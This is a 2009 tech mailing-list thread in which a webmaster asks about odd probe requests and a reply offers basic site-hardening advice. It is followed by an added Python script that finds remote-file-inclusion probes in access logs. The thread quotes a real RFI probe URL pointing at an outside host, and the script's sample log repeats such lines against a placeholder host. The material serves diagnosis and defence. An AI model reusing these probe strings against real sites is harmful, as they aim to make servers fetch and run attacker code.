Jim Lawrence
accessd at shaw.ca
Fri Apr 10 12:41:53 CDT 2009
Hi Peter:

All sites get probed for weaknesses on the web. That is pretty standard. Below is a list of common searches performed by serious hackers looking for opportunities:

1. If any of your directories are readable and have important data, that information can be gleaned. If you have any important data in a website it is open to anyone. There are many open-source or free products like 'BackStreetBrowser' (http://www.spadixbd.com/backstreet/) that can copy a whole site as fast as the bandwidth will allow.

2. Any directories that are writable can be used to either store temporary information or leave time-bombs in hope that you may try and run them... some gullible or tired webmasters have even inadvertently spawned zombies on their sites that way.

3. Some sites that have open FTP (command line) accessible and even password protected may find someone running a little loop routine attempting a dictionary attack... given that there are usually no limits to how many 'tries' the hacker is allowed.

4. If you manage your own mail within your website, build your mail service correctly. Use a Captcha, return email etc... Any web site beyond a Postcard site needs a database and a programmed backend for security and management.

5. If you do have admin access from your site, keep the password long and filled with mixed cases, numbers and special characters.

Outside of that you are really pretty safe.

If you are using IIS, check your logs and see if there is a consistency of login attempts:

c:<windows directory>/system32/logfiles/*.log

and if there is, you can block the range of IPs through IIS > default SMTP > properties > Connection > add.

The site http://whois.domaintools.com/ can be a great source for specifics on a hacker's locations. (I have found traditionally clients' attackers are from China and central Europe.)

You may already know all this but I HTH.
Jim

-----Original Message-----
From: dba-tech-bounces at databaseadvisors.com [mailto:dba-tech-bounces at databaseadvisors.com] On Behalf Of Peter Brawley
Sent: Thursday, April 09, 2009 8:36 PM
To: Discussion of Hardware and Software issues
Subject: [dba-Tech] weird website probes

I've taken to studying NotFound/Unauthorised errors at our site. We get hundreds of weird probes a day, mostly in bursts, eg just a few minutes ago we got about a dozen of these in a few seconds:

www.artfulsoftware.com/php_mysql_win.html%20%20/index.php?var=http://www.candidography.com/zero/id1.txt??

www.artfulsoftware.com/php_mysql_win.html is a real page. The rest looks like a probe of some sort. A probe for what? GET-based vulnerabilities? Anybody have an idea what such vandals might be trying to accomplish?

PB
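
Added example, not part of either message in the thread: one way to pull requests shaped like the one Peter quotes (a query parameter whose value is itself a remote URL, the usual signature of remote file inclusion scanning) out of an access log and report the client IPs that send them in bursts. The Common Log Format, the thresholds, the function names and every IP and host in the sample are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlsplit, parse_qsl

# Constructed sample in Common Log Format (an assumption; adapt LINE_RE to your server).
# IPs and hosts are documentation placeholders, not values from the thread.
SAMPLE_LOG = """\
203.0.113.7 - - [09/Apr/2009:20:30:01 -0500] "GET /php_mysql_win.html%20%20/index.php?var=http://files.example.net/id1.txt?? HTTP/1.1" 404 512
203.0.113.7 - - [09/Apr/2009:20:30:02 -0500] "GET /index.php?page=http://files.example.net/id1.txt?? HTTP/1.1" 404 512
203.0.113.7 - - [09/Apr/2009:20:30:04 -0500] "GET /index.php?inc=http%3A%2F%2Ffiles.example.net%2Fid1.txt HTTP/1.1" 404 512
198.51.100.20 - - [09/Apr/2009:20:30:05 -0500] "GET /php_mysql_win.html HTTP/1.1" 200 8841
198.51.100.99 - - [09/Apr/2009:20:31:10 -0500] "GET /index.php?var=http://files.example.net/id1.txt HTTP/1.1" 404 512
198.51.100.20 - - [09/Apr/2009:20:32:00 -0500] "GET /search.php?q=http+status+codes HTTP/1.1" 200 1203
"""

LINE_RE = re.compile(r'(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+)[^"]*" \d{3} \S+')
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)


def remote_include_params(target):
    """Return the names of query parameters whose decoded value starts with a remote URL."""
    query = urlsplit(target).query
    # parse_qsl percent-decodes values, so http%3A%2F%2F... is caught as well.
    return [name for name, value in parse_qsl(query, keep_blank_values=True)
            if REMOTE_RE.match(value.strip())]


def find_probe_bursts(log_text, min_hits=3, window=timedelta(seconds=60)):
    """Map client IP -> probe timestamps, for IPs with min_hits probes inside one window."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m and remote_include_params(m.group(3)):
            hits[m.group(1)].append(datetime.strptime(m.group(2), "%d/%b/%Y:%H:%M:%S %z"))
    bursts = {}
    for ip, times in hits.items():
        times.sort()
        # Slide over the sorted timestamps looking for min_hits probes within the window.
        if any(times[i + min_hits - 1] - times[i] <= window
               for i in range(len(times) - min_hits + 1)):
            bursts[ip] = times
    return bursts


if __name__ == "__main__":
    for ip, times in find_probe_bursts(SAMPLE_LOG).items():
        print(f"{ip}: {len(times)} remote-URL probes starting {times[0].isoformat()}")
```

A site that legitimately accepts URLs in a parameter would need those parameter names excluded before acting on the result.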